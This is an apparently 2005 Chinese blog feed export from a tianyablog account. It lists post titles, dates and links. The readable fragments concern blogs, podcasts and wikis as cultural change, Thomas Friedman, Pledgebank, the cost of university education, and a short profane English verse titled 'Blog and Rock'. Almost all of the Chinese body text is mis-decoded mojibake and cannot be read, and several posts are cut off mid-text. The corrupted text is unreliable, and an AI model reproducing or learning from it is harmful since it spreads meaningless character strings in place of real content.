    - - - <![CDATA[´׃·¨ׁ§½ַ¶ָ¿´¡°ֲפֹם¾ִָ¸¡±£¨3ֶ×)]]> - forme2poopon - 2005-11-7׀ֶַׂ»(Monday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3132897&idWriter=0&Key=0 - ־ׂµִ¿´·¨£÷ -³ֲ¿ֹׂװ³ֹ¹¦¶ד¹‎ָֻ־×·¨£¬µ«ַ¶ד²»¹‎ֽרֲחµִ׳װָ»·¨¡£ -µְµֲµִֹףֵ׀¸¼׃ײֲֳ°¡¡£ -־ׂׂ»ײ±װֿכװ׃׀»¥ֱ×ֽרµִֹח»בײ׀£¬ֽרֲח»¯ֹת´ז½«»ב³ֹ־×ׂ»ײײ¸צָֹֻת´ז׃כ·¢ױ¹µִ·½½£¬ָָֻֻ׃׀ֽ¨¹‎ֽרֲח׀׀ֶ­µִ׳װ׃ֹ£¬µ«ַֻז׳ֵֽרֲחµֳִסײק»¯£¨²»ײ×µְִ²»ִ׳צµ½£¬µ«ַ־ָֿׂ־×ִ¿ַ°ֽרֲח±ָֿײµֹת»מׂ×ֳסײק£©£¬ֽרֲחְ½חׂ²׃׀ֹח»בֶץװ¼£¬»ע׀ם½«ְ´µִֽרֲח»ב·ַ³£³ֿ׀ֵ£¬¶װ´ֻ־ׂ·ַ³£ְײ¹£¬׃ֶָהַµ±־ׂ׳װ¼÷ּוׁיֱֻ2.0µִ¸קײײ·ב¸»µִ¹µֽ¨·½½÷ֽֽרֲח´«²¥ײ¶־ׂװ÷ף¡£³ֲֿײװֽ¨¹‎ֽרֲח³ֹ¹¦ִ¼׳£¬¾ַֽ¶װֽרֲחֱ¦ֱ¿µִ׳מ´ףµִײ₪ֳק£¬µ«ַָֹֻתµֲִ·»¹÷³₪°¡¡£¼ֹט10ִךׂװ÷ף£¬ְָֻאֽ¨¹‎ֽרֲחַ©¶©ֽךֱֻֽרֲחµִֹח»בֶץװ¼£¬ִַ¶װ׃׃׀³ֿ׀ֵ־µדµִָֻ£¬½«ָח÷־ֹת´זִ״£¿ -]]> - 2005-11-7 11:25:00(0) - - - - <![CDATA[ײ׀־ִֽרײ¾ִך»ב¹יְ´]]> - forme2poopon - 2005-11-6׀ֶַָױ(Sunday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3126184&idWriter=0&Key=0 - £ £ ׳עּלµ½¼ׂ11µדֱֻ£¬½סּל³י¿ױ׳½בׂ»ֲֿ
    £ £ 
    £ £ ¾ֽװֹֿ÷£¾°ל£¬²»ָ¥¿ֿ¶¨»בֵׂ÷¶¡£¶רַׂ»¹ֿכָֿ¶ׂ»ֲֿ3¸צֳ»¼¹‎ֳזµִֽר׃ׁ£÷
    £ £ 
    £ £ ²¥¿ֽ±¦µהµִHOPESOME£¬jobuiµִײ££¬÷ֽISSAC¡£¶¼¼ֱֳֻז£¬ֻ³ְֽך³ָֹ־־ס£¬»¹׃׀÷ֳ¶אױ»ס¡£
    £ £ 
    £ £ 1£¬ָֿ¶ֱֻberingpoint µִBilly£¬¼µ½ֱֻKEN£¨³‏ֿײָֹֿֿ¶µִֵף׃ׁ£©£¬1BLOGSµִMICHAEL£¬101gallery µִRobert¡££¨ֶהֻ»¹׃׀÷¶א£¬µ«ַ²»´ףֿ°¹ײק¶¯ױָֻׂ£¬ֻשׂװױגְןײ»½יֹ¼¸־»ײ־§µִֵף׃ׁ£©
    £ £ 
    £ £ 2£¬ּ‎ׂ¶׳׃ֻµֿכֽ¨¹‎BLOGµֿײ²ֶ־ס׳װ׃ֹ£¬׃ײ¼ב¶¨ֱֻ־ׂµִ¹״׃BLOGSPHERE FINANCIAL RINGµִֿכ·¨£¬ֲֿ־ח³י]]>
    - 2005-11-6 16:49:00(0) -
    - - - <![CDATA[ֲפֹם¾ִָ¸׃כֽרֹֿ°²ֹםֱ¢ֳ]]> - forme2poopon - 2005-11-4׀ֶַ־ו(Friday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3105606&idWriter=0&Key=0 - ־ׂ׳¢ׂגµ½׃׀÷¶אֻ״²»ֿא¶µִָֻ¶¼װֽרֹֿ¿¶¿®ֿאײת£¬¶רװֹת»מײ׀£¬¼ֹט³ֲֽ¬ׁ§ַ¹עװֹֿ÷£ֳָֻס¹ד³¡µִµ״ּתְןֳז£¬ֽ¬ׁשִַַ¸צֻ״²»ֿא¶µִָֻ¿ִֹ²»»ב½גִׂ¡£ַµִֹֽֿרµִָֻµִ׀ְִם÷ֽ׀׀־×ַ÷׃׀ָ₪µִׂ»¼‏ֲַי¡£ - -³ֲֽ¬ׁ§µֲִַיֿײװ±»¸דµִ·׀·׀ׁןׁןֱֻ£¬´׃ִ¼¼¯׳½נµִ½ַ¶ְָ´ֻµµִ»°£¬³ֲµִױ׀¹ֹֻµֳקי׃׀µײ׀װ§־ף£¬ֳ»׃׀·÷ֽֿ¸ֳק׀װװ­װע¡£ֶהµִ״ױגײײֲַיײ׀¹תµִֹֿ׀¹«ֻ¾ִִ¼ׂ²»׳צ£¿¶רַָׂ¦µִַ®¸¶א£¬ִַ°ןװ׃ײײ»¨ַ®±ָ³ֲֽ¬ׁ§»¹ׂ×÷£¬¶װ¹ת¼ׂ¡¢ֳס׳ו·¸ֲֿµִ׳ן׀׀±ָ³ֲֽ¬ׁ§ֿׁײ״ַ§ֽע±¶¡£־ײֳ´²»¼ָֻּײ·¥£¿÷¼עµ¥£¬´ף¼ֱׂ½ֿבַיװ¸£¬¶רַׂ²»ַֻµ¡°¹ֹ׀׃׀·חֿױ£¬ָכ׀׀ט½קֹק¡±ֲנ£¿ױגׁשֲִִֵ±»ֶ­µֳַד¼ׂµ´²ת£¬ֳַָֻׂ²ײ»ַ¹ײ׳¯¼ׂ£¬ָ´²»־ַ®ָ¥ְִִןֱֻ£¿ - -¶ר׳ײתװע²»ֽ¬£¬ֻµµ»°£¬±¾ְ´¾ֽ²»ַף»״±¨µִ£¬µ«ַ־ײֳ´»בװגµ½ָח´ַֻ´װנִ״£¬ׂע־×ֻ‎ֶֶ»µֱֻ¹ז¾״£¬׃׀ֶָֻײ®ֿ׃£¬¶רֳַָֻ¶װ׃ײ׀ֹ½ְַַ׳מֽ´÷µִ¡£ֻשׂװ»ב³צֳִַ´¶א·ם¯¡£ - -ְ׃ֳֽרֲחֶ­ַ®ַ÷ָׂ׳µִ£¬ְ׃ֳָֻµִִֶֹמ÷ֽ¶װָֻµִׂ»µדµד׀ֵָ־£¬1ׂ¸צSPAMְֲֿ´£¬׳»ב׃׀ֻשױ¶»ס£¬µ«ַ¾‎׳׃²»³¡£ - -µ«ַ־ׂׂ»ײ±ָֿ־×ֽרֲחֹֿµִֽ¸ֳקָֻ½«ְ´¿ֿ¶¨»ב»סµֳ¾´ףµִ³ֹ¹¦£¬ֻשׂװ־ָֿׂ־×ֽרֲחµִִהֳ±´ת׃¦¸ֳ¾¡װחײױ½ב£¬װ2.0µְִֻ³±ײ׀£¬ֳ¿¸צָֻ¶¼ַ¶¥ּלֱ¢µ״µִ£¬ׂע־×ַ¿ָ¨÷ֽ׃ֵ×װֳסײקµִֽרֲח¿ױ¼הְןֳַ»׃׀׀³¡µִ¡£ׂ²׀םװֿײµֹת»מײ׀ִד»¹װ±²»ִ³ֹ־×ׂ»¸צױזױ‎µִָֻ£¬ֳִַ´װֽרֲחµְִ½חײ׀ָֿױ¾ֶנְ´°ֹ¡£ִדµִׂ»¾ׂ»¶¯ׂ»ׁװׂ»׀׀£¬׀ײµ½דֳֳֳַ¶¼װ׳¢׃׳ִֵד£¬ײ»ׂ×ִד־×ֶֹ£¬ֶָֹֻ¶¼»בְ´°ןִד¡£]]> - 2005-11-4 11:36:00(0) - - - - <![CDATA[·¨²»¿ֹ¹¹«ֳסֶױ±יֿ׃׳ןײ׀]]> - forme2poopon - 2005-11-4׀ֶַ־ו(Friday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3105176&idWriter=0&Key=0 - ־ׂ¾ץµֳ־ֳַַָׂ±ֹ׳װָ»·¨µִװ¼ר£¬ׂ»·½ֳז׳מ¸ײ´ױ‏ױֿ׃׀ױׁ§¼ֻׂ¼־¬£¬ֱםׂ»·½ֳז׃׀ֱֻ´ף¹זִ£ֹ±ָֻ־הֶק£¬¿ֹׂװֶ«°²ׂ»׃ח£¬׳קֽ‏׳ק¸£¡£ױגׁשװ¹²÷ֽײֶ¶ֲָֿ£¬¹ת¼ׂµ¼ַֹֿ±»½³ײֱֻ£¬ֳסײײ»ִ׳ס״ַ·¨װע²ִֵ»סµֳֹת´ז¡£ֽ³ײ־ַµִָֻ£¬ײ»׃׀±הµֱֳ¬ַ¶¼²»ָח£¬²ִֵ¹¶ָ«׀װֳ¡£ -¶ס¶סׁ­»·£¬²»¼ּלָױ¡£ -÷÷־ִµַ¿׳ֳֿײ®µְ׳ק־×׳װָ»·¨£¬ָ¥³‎¿ֱ·¨£¬ׂװµֲײ־¹ת¡£־ֳַׂ¹ת¼ַׂ°¼¸ִךׂ²׃׀ָֻֻµׂװµֲײ־¹ת£¬ָ´·ֵ׳ֻ½׃£¬§׀ֵּלֲֿ£¬ֽעֳס¼¥ײ®װ¹ײ®¡£ײֱ׃½סָױ£¬²»¹ַׂװ·¨»¹ַׂװµֲ£¬־ׂ¾ץµֳ¶¼ׂ×ָ¡¾צ׃׳מ¸ײ´ױ‏¼¯ֵַֽ·סִ¹»ֹםּוֱ¦׀׀ײ®¡£ -·סױ£¬²»¿°ֹטֿכ¡£]]> - 2005-11-4 10:59:00(0) - - - - <![CDATA[blog´רְ´µִ¸ןֳ²¢²»ַ¼¼ץֹֿµִ£¬¶רַ׃ֳ»§ּ¬¶ָֹֿµִ¡£]]> - forme2poopon - 2005-10-31׀ֶַׂ»(Monday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3067101&idWriter=0&Key=0 - ׃ײֿכµ½ֹֿ׀ֶַTHOMAS FRIEDMANֻµׂע־×׃׀ֱֻRSS£¬BLOG£¬PODCASTײ׀¹תװ¾­ְתׂ»³¡׃ֲֹֿ¶רֹֿµִ־ִ»¯¸ןֳ¡£÷ֽ׃׀׀©ָֻֻµBLOGׂ×¶װBBSֶנµ½ֽ‏׀²¡£¸ש¾־ׂ׳װ¼÷µִּוׁי£¨2.0²»¾ַֽ½²ּוׁיֲן£©£¬־ׂµֳ³צֱָֻחֹֿ½בֲ£÷blog´רְ´µִ¸ןֳ²¢²»ַ¼¼ץֹֿµִ£¬¶רַ׃ֳ»§ּ¬¶ָֹֿµִ¡£ -ַµִ£¬ׂ»³¡¸ןֳױ‎װװִֽנ£¬ִַ־ײֳ´BBS·¢ױ¹ֱֳִַֻ´¶אִךֳ»׃׀´רְ´¸ןֳ£¬µ¹ַױג¸צ´ף¼ׂ¶¼±ִֹׂµִBLOGִ´רְ´ױגײײֱ¦ֱ¿ִ״£¿ -ִַ¾ַֽ׃ֳ»§ּ¬¶ָ£¬BBS´ף¼ַׂׂ»ײײִהֳ׀ְִםµִ½»ֱק£¬¶רBLOG£¬´ף¼ֻׂµ¶װֱֻ£¬ַֻׂ»ײײ¸צָֻּ¬¶ָ£¬ׂ»ײײ־ׂ¶װ־ֻׂµµִ»°¸÷װנµִּ¬¶ָ£¬¡°ַµִױגַ־ֿׂכµִ£¬־ׂׂ²ױגׁשֻµֱֻ£¬־ׂ»¹ׂ×ָ¥׳צ¡±ױגײײּ¬¶ָ£¬¶װײ׀¹תָֻװ­ָֿ²»ֲ¶ֹשֹ«£¬ֲֵ³צֽ·µִ׀ְִםַׂ»¸צ½ר²½¡£¶רַׂBLOG¸ָׂ׳ױׂµ½׳װ¼÷µִֽ¬ְא£¬ֻש־½ׂ»¸צ÷ֳ÷÷ָ‎¸צ°ן£¬װ­ָֿBBSµִ°ז¾־ׂׂ²²־¼׃¹‎ׂ»׀©£¬µ«ַֻµµ»°£¬־ֳַׂ׳װ¼÷ׁׂ¾­¸רֱֻֻׂ»¸צ÷÷ֳµֳִ׳ײ¡°¸¯°¡±¡£ֳ»²ֳ´ׂגׂו£¬ׁװ²»¼°ׂו£¬ְֻ·ׁ±¼ה¡£ -׃׀ֱֻBLOGױגײײ¸÷װנָ־µִֽרֹֿ½»ֱקµִּ¬¶ָ£¬¸צָֻ׃ײַ¿´ףֶנְ´ֱֻ£¬²»װ־·¾ו÷°µ£¬²¢ַׂׂ×ֿע÷°µ·¢ֶנ½ר¹¥£¬ױג¾ַֽ¸ןֳµִװ­¼¶¯ֱ¦¡£ -µ«ַ־ׂױגְן½²¸ןֳ²¢²»ַֹ¿¶¯²ֳ´£¬ױגְןַׂ»³¡ײ×¶¸ןֳ£¬ׂ»³¡·¨ײֶ¸ןֳ£¬ׂ»³¡¹תֳסײ®¼הְם½ג׃כ½²ְםײ״׀ֲ¶©ֱ¢ֹח»בֶץװ¼µִ¸ןֳ¡£ -BLOG£¬BBS£¬RSS£¬PODCASTױג׀©ֳָ½ּ׃‎׃כײ×¶µִ´«²¥װ½ְ´װ½·½±ד£¬׳מ½׃¢־ְִ½חׁׂ¾­½טײתױג׀©¼¼ץ¿×¼ֱֻ׳װ׃ֹ½ּ׃‎£¬¼׃ֳַֹֻֿ±¾ְ´¾ֵֽ׃´ףµִײ×¶»‎ְ£¬׳ק־×ׂ»¸צַו׀ׁµִײ׀¹תָֻ£¬־ׂ¸זֻ´ף¼ׂ£¬־ֳַׂױ‎װ±»ֻ¦¿×£¬װ־ֳַׂµִ»¥ֱ×ֽר¿¿׳ֵֽרֲח׃־ֿ·÷ֹֽ«ַיִָׁר»מµִ±÷ע£¬ָֻ¼ׂװ´«²¥ײ×¶¡£ -½ּ׃‎ְַםֿכ¹תµִ»ש¯£¬־ׂׂ²ֿ£ֽ־ֳַׂ¿ֹׂװְ׃ֳױג׀©¼¼ץBLOG£¬BBS£¬RSS£¬PODCAST£¬WIKIְ´׳מ´ף³ּ¶ָµִ½ר׀׀½ּ׃‎¡£]]> - 2005-10-31 10:58:00(0) - - - - <![CDATA[·ַ³£׃׀ָ₪£¬·ַ³£ױנ÷³£¬·ַ³£¸ןֳ£¡]]> - forme2poopon - 2005-10-25׀ֶַ¶‏(Tuesday)ׂץ - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3020045&idWriter=0&Key=0 - £ £ TEDµִChris־×ֱֻ±ם¾¶װpledgebank(http://www.pledgebank.com/)µִײ§³ײׂ²³׀ֵµֱֻ1000ְֳװ×׀ֹֽ׳מ¾´´ׂגµִ³׀ֵµ¡£
    £ £ 
    £ £ I pledge to give $1000 to the person with the best eyepopping pledge idea offered here by the end of October, provided more than 5 people contribute an idea.
    £ £ 
    £ £ Pledgebankַׂ»¸צ·ַ³£׃׀´´ׂגµִֿמִ¿£¬ַ½´׳ֿµִ£÷־ׂװֽרֹֿ³׀ֵµ׳צׂ»¼‏ֲַי£¬µ«ַַ°ּבַ׀טׂ×µֳµ½´ף¼ׂµִ°ןײת£¨±ָ·½ֻµ־ׂ³׀ֵµ־ָׂ¥׳צ10000¸צ¡°־ׂׂ×ֿ·¨¡±µִ»ױױֲ£¬ײ»ׂ×׃׀10000¸צֽר׃ֽׁ¬ׂגּלּלֵו´ר£©¡£ֳ¿¸צָֻ¶¼ֶ½µָ²־¼׃£¬£¨µ±ָ»÷ֳµִ´´]]>
    - 2005-10-25 22:09:00(0) -
    - - - <![CDATA[־ׂ²»ׂ×׳װ׃ֹײקׂו£¬־ׂׂ×ֿ·¨]]> - forme2poopon - 2005-10-25׀ֶַ¶‏(Tuesday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3019536&idWriter=0&Key=0 - ֿ·¨ַ²ֳ´£¿ - -ױג¼¸ּל¿×¼־×ֳקִךµִֻ¾·¨¿¼װ׳צ׳¼±¸£¬¶ֱ¶ֱ־ֳַׂµִֿ·¨£¬ִׁ¹ײְמ°½ָֹֿת»בֻµִַ¾ה»°¡£µ«ַ־ָׂ·µ±»°‏¶ב¹«ֳסָ¨12ִךֱֻ£¬װ´ףׁ§µִ±÷ע´׃ְ´ֳ»׃׀ֽ¶¹‎ׂ»ױֵׁ¡ֶ±¡£±ֱֻֿׂµ¸דֱֻ¸צֹֿ÷£¼¯ּו»§¿£¬µµ°¸·ֲָֻׁ·ִׁךִך½»£¨׃׀ׂ»ִךײֽ·½פױֵ£¬ַ·ֱֻ°כִך£¬»ֶֶײַרָֻ²ֵײ׀׀ִµְִֵֻ®ָֻ£¬¾¹ָ»ֻµׂ×װץֳ´װץֳ´µִ£¬־ֻׂµִִַד¾ֽ°ׁ־ׂµִ»§¿׳¢ֿתֱֻ°ֹ£¬־ׂ²»ׂ×־ׂµִ»§¿ֱֻ¡££©ׂ²´׃ְ´ֳ»׃׀ֽ¶¹‎ׂ»ױֵׁ¡ֶ±¡£ - -µ«ַ³‎ֱֻײ×µְװ­ְ´ֿ·¨ַױגֳ´ױ¾װֳָֻסׂ»±ׂװֽג£¬ׂ×ַ²»ײ´׀׀ֿ·¨£¬װ°‏¶ב־ׂ¼¸®ִך¹«ֳסָ¨£¬ֳִַ´ֿ·¨¶װ־ְׂ´ֻµ÷ֽׂ»¶ג²ײ½׃׀²ֳ´ַר±נ£¿ - -÷ֳ£¬ֿײװׂע־×ׂ׿¼װֻשׂװµֳ±³°¡£¬µ«ַ´׃ְ´ֳ»ֲִ׀׀¹‎¹«ֳסָ¨µִָֻ»¹ױזֽ¦ִׁµִ£¬²ֳ´ָ«¹תָֻ´ף׳יײ¯·¨£¬½סּל±³ֳקּלֽ¡£ - -¸ױ²ֵװ·¨ֲֲֹּ³ַףײת´ף¼ׂ£¬־׃׀ֳ»׃׀²ֳ´µח׃°µח׃¿ֹׂװ׀־ֿףµִ¸׀ׂ»±יµִ£¬²»¹‎±ָ½ֿ׀¡£־ׂ¿´ָ¥ִךְֳ¹ת׳ֽ³ׁ¡¾µִ±÷ע£¬ֹֿ÷£µִ׀¡ׁ§ֹת»¹ֶױ¼°ֱֻׂ»´־ׁ¡¾ײ×¶£¬µ«ַ¶װ׃30ֻךµִ³ִֹךְָֻ´ֻµµ¹ױזַ¸צִּׁג¡£ - -־ֿׂײװµ¹ַ׃׀¸צֿכ·¨£¬¾ֽ´׃ֶױ·¨µִ½ַ¶ְָ´ֻµ£¬׀טׂ×ױגׁשׂ»¸צֽ¨ֻ׳ׂ׳¶®µִ½ּ²ִ£¨ׂפֶµ£¬׃ֶµ£©ׂ×ֳָֿ·¨µִײ×¶ְֳל׃ֳ¿¸צָֻ׀ִײ׀£¬ױגׁש־ֳַׂ²ִֵֻµ¡°־ׂ²»ׂ×׳װ׃ֹײקׂו£¬־ׂׂ×ֿ·¨¡± - -²»ָ»£¬־ׂ»¹ױז²»ײ×µְָח÷־¹׃ֳֿ·¨±£»₪׳װ¼÷¡££¨ְֻ·ׁ¹ת¼ֵׂאׁרµ½־ׂ´ףׁ§±ֿׂµ°¡£¬ֱ¬׀¡ׁ§ֹת¶¼²»ָחֱֻ¡££© - -===================================== -׀­ֽ¬ׁ§ֿ°¡¢׳װ׃ֹ½ּ׃‎ -־ׂµִBLOG£÷http://www.podboq.com/blog/5/index.html]]> - 2005-10-25 21:25:00(0) - - - - <![CDATA[¡¶װג׃צָ¨װײ¡·£÷־ָ¶¨²¢־´ׁ¹µ¹ׂ»ַ׀£¬ײ»ַׁ¹µ¹ֱֻ־ֳַׂ]]> - forme2poopon - 2005-10-23׀ֶַָױ(Sunday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3002180&idWriter=0&Key=0 - ׳קױ£÷JAMES1977¡¡»״¸´ָױֶ£÷2005-10-18¡¡20:29:54¡¡ -¡¡¡¡ױג¸צֲ¼­²»¶װµִ¡£ -¡¡¡¡ -¡¡¡¡ׂע־×·ײֵה²»¹«£¬ ¿×¼»³ֶֹׂנ־ָ¶¨ױג¸צ´ףַ°ּבְ´ֱֻ¡£ -¡¡¡¡ -¡¡¡¡װ²»־ָ¶¨ֲֿ£¬ ֶהµ·ײֵה»ב¸ֵ₪ַת¡£ -¡¡¡¡ -¡¡¡¡ײ׀¹ת׃׀¼¸ׂµִֵ©ֳסׂ׿¿¹₪ׂµ»¯¾ֽׂµ³װ·¹£¬ ִדִײµֳ²»־ָ¶¨ֱֻ£¬ ¹₪ֹּׂµµע±ײ£¬ ¶צְֱִַָֻֻֻ²ֵַ²»¹«¡£ -¡¡¡¡ֹ‎ָֻ·¢׀¹ׂ»ֲֿ¿ֹׂװ£¬ ַ§ֽע±נµ±ַױזְם¡£ -¡¡¡¡ -¡¡¡¡÷ֶֽ½־ָ¶¨²ֵַױזְם¡£ -======================== -¹«ֶ½׃כױ‎ׂוַָֻ׳ק־׸צּו£¬ׂ²ְַָֻא׳ק־×ָ÷ּוµִ׳·ַף£¬־ָ¶¨׃כµְׂו±ֶָנְ´ַ¸צ׀¡ַ°ּב¡£ -²»־ָ¶¨²»ׂ»¶¨¾ַֽױ½ֲׂ£¬¶רַׂ¼´¹׃׀ָֻ¹·¼±ּרַ½ׂ×װל·´£¬ִַׂ²ַ·ֹ¶ךֶֻ»נ£¬ֿײ´תֹח»בװל·´¿ֲִֹנ£¿ײלָ»שµ±ִך׀ִֵµ©µ©ֻµׂ×ֹ±100¸צָֻ£¬ׂ×ױז¶¯ײֱֻ¿ִֹ»ב´רְ´¾ײ²¿µִ²»־ָ¶¨£¬µ«ַױגׁשµִ²»־ָ¶¨־ַׂײ§³ײµִ£¬100¸צ¶סֱָֻפװְֹֿׂ×±¶¾10ְׂטע£¬ױג¸צֻדץ´ף¼ׂ¶¼»ב׳צ°ֹ¡£ - -ֵ©ֳסׂ׿¿¹₪ׂµ»¯³װ·¹£¬־ַׂµׂ»װגּ‎µ½£¬ֿײװ÷־ָ¶¨£¬³ַ׀ֶ¶ֳסׁׂ¾­¿לµ½¶צְֻµִ¾³µ״ֱֻ£¬ִַַ°ִַ100¸צ»¹ֱפ¹·ֳװָֻ¼הָֻֻש´ֽ¡£ - -÷ֶֽ½־ָ¶¨´׃ְ´²»ַױזְם£¬»µ¾ֽ»µװ´ף¼ׂ¶¼׃׀ֱֻװ­׳׃µ¯£¬²»ָ»µ®´־ְ½ח´ףױ½¶¼´ע÷ֱֳֻ¡£ - -ײ׀¹תµִ¹ֱֵ׳²ת½׳¼¶ׁׂ¾­÷ֽ־ק·½׳²ת½׳¼¶½ב³ֹֽ¬ֳֻ£¬־ָ¶¨¶װְֳַֻ´ֻµׁׂ¾­ׂ׳ָח·´ױֶ£¬µ«ְַָֻאְת·ֿעְ´¾ֽ²»·¦ֿ·¾ח׀װµִ£¬´ף¼ׂµָ׳ֵֶַ°ֹ¡£]]> - 2005-10-23 22:23:00(0) - - - - <![CDATA[Blog and Rock]]> - forme2poopon - 2005-10-22׀ֱֶַש(Saturday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=2989012&idWriter=0&Key=0 - £ £ Come on brother, let's go blog,
    £ £ 
    £ £ Blog is rock,
    £ £ 
    £ £ Fuck them advanced sex education,
    £ £ 
    £ £ Blog is ejection.
    £ £ 
    £ £ Come on brother, let's go podcast,
    £ £ 
    £ £ Podcast is rock,
    £ £ 
    £ £ Kill them high edu industrialization,
    £ £ 
    £ £ Podcast is revolution.
    £ £ 
    £ £ Come on brother, let's go wiki,
    £ £ 
    £ £ Wiki is rock,
    £ £ 
    £ £ Do them freedom equlity humanity,
    £ £ 
    £ £ Wiki is solution.
    £ £ 
    £ £ --www.p]]>
    - 2005-10-22 10:24:00(0) -
    - - - <![CDATA[ײ׀¹תµִ׃ײׂ»´־־ִ»¯´ף¸ןֳ]]> - forme2poopon - 2005-10-21׀ֶַ־ו(Friday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=2984228&idWriter=0&Key=0 - £ £ THOMAS FRIEDMANµִ׳¨ְ¸ֿײװֳג·ׁ׃ֳ»§¿´²»ֱֱֻֻ¡£²»¹‎´׃ױ×ׂ׿´ַֻµױג´־ֻז׳ֵPODCAST£¨²¥¿ֽ£©µִ·¢ױ¹£¬½«ׂ×׃׀ׂ»³¡׳װֲֿ¶רֹֿµִ־ִ»¯´ף¸ןֳ¡£־ׂׂ²ַױג¸צֿכ·¨£¬µ«ַ׳עּל¸ױ°ׁWIKI¸ר·גֱֻ£¬־ׂ²»´ףַו³‏THOMAS FRIEDMANµִָ«־ִֻµֱֻ²ֳ´£¬µ«ַֻµִ־ִױֲ־ֿׂכ¶אֹ»בׂ‎ֶנ¹·½µִ׳¢ׂג£¬װֿײװPODCAST£¨²¥¿ֽ£©»¹װִִַַ»‎¾ֱִ¿µִ±÷ע£¬ֻױגֳ´ֻµ²»ײ×µְַ÷ֲֳ»¹ַ»µֲ¡£]]> - 2005-10-21 20:27:00(0) - - - - <![CDATA[¸׀£ְ©ױ׀£¬µ±׀ִֹח»ב¶¯µ´£¡]]> - forme2poopon - 2005-10-18׀ֶַ¶‏(Tuesday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=2958091&idWriter=0&Key=0 - ¶ֱ´ףׁ§ַ¸¸ִ¸ֽ¶׳£¬¶ר¸¸ִ¸ֳַ¶¼±ָ½ֿ÷ֳֶֶ­£¬װµ¥ׂ»ֳ½ּוµִ׀´«¹¥ֲֳֶֿז£¬׃׀¼¸¸צ¸¸ִ¸¶¥µֳ׳¡µִ£¿ֻשׂװ׀³¡׀טַף·½µִײקּוַ±ָ½ֿ÷ֳ¶װ¸¶µִ40-50ֻךµִָָֻ÷¡£ -¹©׃¦·½ַ׃׀׀³¡ֲ¢¶ֿµ״־»µִױ‏¸®½ּ׃‎»ת¹¹£¬ׂע־×¹ת¼ָׂ±ֹײקָֻ£¬ׂע´ֻ¹ְםָֻ³ֱֹֻײקֱָֻֻ£¬¹ְםױ´׃׳װֹםְׂז׳מ´ף»¯³צ·¢£¬ׂ»·½ֳזְ׃ֳ¹«¹²׳װ´--¹ת¼ׂ²ֶױ‏£¬¼ּ׀ר׳·¼׃׃²¼‏ֽ¶׳£¬ׂ»·½ֳז¿×׳דֲםֱ¦£¬½ר׀׀׀³¡׃×ֿת£¬¶רַׂ½ּ׃‎ֿ·ׁµְִ­¶¯ַ¾×ָֻµִ£¬²»½צַׁ§·ׁ£¬¹גׁ§׀£µִ÷ףַ¾ִֽׁר»מ¹ְםױ¾ֵ׳ו÷ֳ¼¸±²׳׃¡£¾ֽֿףµ±³ץ׃¢¹ת¸דָ¦µ״װֻ¶¯ׂ»ׁש£¬׳±¾׀טׂ×װ­¼µִ»‎ְ¡£ױגײײ½ּ׃‎ּוײֶ־·ַׂ²ֲַ׃¶בµִׂ»ײײ׀־½¡£ -ָ»¶ר²»׀ׂµִַ£¬ֿײװ²»ֿף¹₪ׂµ¸ןֳ±£¬»ש±¾ֹֿ»¹ַׂװ¹תִ׀³¡־×ײק£¬־ֳַׂ¸ױ¸ױ³ֹ¹¦¾°לֱֻ20¹ת²ֶ³₪»בׂי£¬WTOׁׂ¾­ֳָָ«ַע׳±¾װײ׀¹ת÷ב׀׀־׳ט¡£¹ְםױֳַ²¢ֳ»׃׀½«ֲ׃¶בְ´µִ׳±¾ֽ¶ָכµ½ְ½ח¾­¼ֳ¾÷ױשײ׀£¬ֿא·´׃ֹ׃ַַבֹֻµְֳ´µִ׳±¾£¬ֳַֻ¸ַדֿע׃³ְױ½׳²ד£¬»ע׃ֳ׃¼«¶ָֿםְײ¡£ַ°ײײׁ¡װסµִ÷ף¹¾ַֹֽח»בֹֿµִ´´ׂµױװ½ְ´װ½ֹ£¬´´ׂµ׀טׂ×׳±¾ױג´ף¼ׂ¶¼ײ×µְ£¬µ«ַֽ¨¹‎ָ¨ְ÷ָֽ¹´ר¹״ֿµµְֳ´׳±¾µִָֻ£¬ֳ»׃׀ֱִ¦´´ׂµ£¬׳עּלּ‎ׂ»¸צ¹«ֻ¾±£°²´ף÷פ±´ת¿´²»¶®£¬ֻµֳַֻ¹«ֻ¾װֲ½¼ׂ׳לִ³´ףֲ¥µִ±£°²£¬ּלּל¿×±¦ֲם³µֲֹֿֿ°א£¬ׂ»¸צװֲַ§°ׁ¿לַ®¹₪׳£¬ׁר³µ¶¼²»¹»¡£÷ףׂ»ײײׁ¡װסµִ÷ף¹¾ַֽ£¬²ֽׂ·±ָ£¬ז½¼ֻ·±ָ£¬ׂ²²»׃ֳ¶אֻµֱֻ£¬´ף¼ׂ¶¼¿´װְׁן¡£׳װ׃ֹ¾­¼ֳ¿לׂ×ֳנ¾רֱֻ¡£ -ָ·µ¼¸°ֽעִךַבֳָֻ»׃׀¹₪׳קִַַ±ָ½ֿ¿ֲֵֹµִׂ»¼‏ֲַי¡£ֳָ½ּ׃‎¶אׂ»׀©׳װ׃ֹ¾­¼ֳµִ³ֹ·ײ£¬»ע׀םַ½«ְ´½ג¾צ־ּגµִ°ל·¨£¬־ׂµִֿכ·¨ַ¹«ֱ¢´ףׁ§µִ½ּ׃‎׳װ´¶װ׃ֳ¿¸צָֻ¶¼׃¦¸ֳַ¿×·ֵµִ£¬¶ר²»ַ¹ְםױµִֻ½׃׀²ֶ²ת¡£´ףׁ§¸¶אׂ»µד£¬׳װ׃ֹ¾÷ױש¡£ׂ׸זֻ¿¼ֹת18ֻךׂװ÷ףµֲִַי׃כ¸¸ִ¸־¹״£¬¶ֱ´ףׁ§µִ·חֿױ׃כױׂז׳װ¼÷ָ¨÷ג¡£ 